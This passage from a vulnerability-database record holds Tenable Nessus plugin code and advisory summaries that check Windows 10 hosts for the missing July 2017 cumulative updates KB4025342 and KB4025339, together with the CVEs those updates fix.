PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. 
A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. 
(CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8598, CVE-2017-8603, CVE-2017-8604,\n CVE-2017-8605, CVE-2017-8610, CVE-2017-8619)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8617)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025342/windows-10-update-kb4025342\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8811feb6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4025342.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'ms17-07';\nkbs = make_list(\n '4025342' # 10 
1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"07_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4025342))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:12:43", "description": "The remote Windows host is missing security update KB4025339. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. 
(CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). 
An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context.\n (CVE-2017-8563)*\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A remote code execution vulnerability exists in\n Microsoft HoloLens due to improper handling of objects\n in memory. An unauthenticated, remote attacker can\n exploit this, via a specially crafted packet, to execute\n arbitrary code. (CVE-2017-8584)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. 
(CVE-2017-8592)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)\n\n * Note: CVE-2017-8563 introduces a registry setting that\n administrators can use to help make LDAP authentication\n over SSL/TLS more secure. Administrators need to create\n a LdapEnforceChannelBinding registry setting on machines\n running AD DS or AD LDS.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "KB4025339: Windows 10 Version 1607 and Windows Server 2016 July 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUL_4025339.NASL", "href": "https://www.tenable.com/plugins/nessus/101366", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101366);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n 
\"CVE-2017-8566\",\n \"CVE-2017-8573\",\n \"CVE-2017-8574\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8584\",\n \"CVE-2017-8585\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8595\",\n \"CVE-2017-8596\",\n \"CVE-2017-8598\",\n \"CVE-2017-8599\",\n \"CVE-2017-8601\",\n \"CVE-2017-8602\",\n \"CVE-2017-8603\",\n \"CVE-2017-8604\",\n \"CVE-2017-8605\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8609\",\n \"CVE-2017-8611\",\n \"CVE-2017-8618\",\n \"CVE-2017-8619\"\n );\n script_bugtraq_id(\n 99387,\n 99388,\n 99389,\n 99390,\n 99391,\n 99392,\n 99393,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99402,\n 99403,\n 99404,\n 99405,\n 99406,\n 99407,\n 99408,\n 99409,\n 99410,\n 99412,\n 99414,\n 99416,\n 99417,\n 99418,\n 99419,\n 99420,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99432,\n 99434,\n 99438,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025339\");\n script_xref(name:\"MSFT\", value:\"MS17-4025339\");\n\n script_name(english:\"KB4025339: Windows 10 Version 1607 and Windows Server 2016 July 2017 Cumulative Update\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4025339. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8467,\n CVE-2017-8556, CVE-2017-8573, CVE-2017-8574,\n CVE-2017-8577, CVE-2017-8578, CVE-2017-8580)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context.\n (CVE-2017-8563)*\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in\n Windows Input Method Editor (IME) due to improper\n handling of parameters in a method of a DCOM class. 
A\n local attacker can exploit this, via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8566)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A remote code execution vulnerability exists in\n Microsoft HoloLens due to improper handling of objects\n in memory. An unauthenticated, remote attacker can\n exploit this, via a specially crafted packet, to execute\n arbitrary code. (CVE-2017-8584)\n\n - A denial of service vulnerability exists in the\n Microsoft Common Runtime Library component due to\n improper handling of web requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition\n in a .NET application. (CVE-2017-8585)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. 
(CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - Multiple remote code execution vulnerability exist in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit these, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8595, CVE-2017-8598, CVE-2017-8603,\n CVE-2017-8604, CVE-2017-8605, CVE-2017-8619)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8596)\n\n - A security bypass vulnerability exists in Microsoft Edge\n due to a failure to correctly apply the same-origin\n policy for HTML elements present in other browser\n windows. An unauthenticated, remote attacker can exploit\n this, by convincing a user to follow a link, to cause\n the user to load a malicious website. (CVE-2017-8599)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8601)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606, CVE-2017-8607, CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8609)\n\n - A spoofing vulnerability exists in Microsoft Edge due to\n improper parsing of HTTP content. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to click a specially crafted URL, to redirect the user\n to a malicious website. (CVE-2017-8611)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. 
(CVE-2017-8618)\n\n * note CVE-2017-8563 introduces a registry setting that\n administrators can use to help make LDAP authentication\n over SSL/TLS more secure, administrators need to create\n a LdapEnforceChannelBinding registry setting on machine\n running AD DS or AD LDS.\");\n # https://support.microsoft.com/en-us/help/4025339/windows-10-update-kb4025339\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9415d772\");\n # https://support.microsoft.com/en-us/help/4034879/how-to-add-the-ldapenforcechannelbinding-registry-entry\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?00f4a98e\");\n script_set_attribute(attribute:\"solution\", value: \n\"Apply security update KB4025339 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8589\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright 
(C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-07';\nkbs = make_list(4025339);\n\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to both OSes and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\n\nif (!isnull(ret) && ret == 'LanmanNT' && my_os_build == '14393')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if 
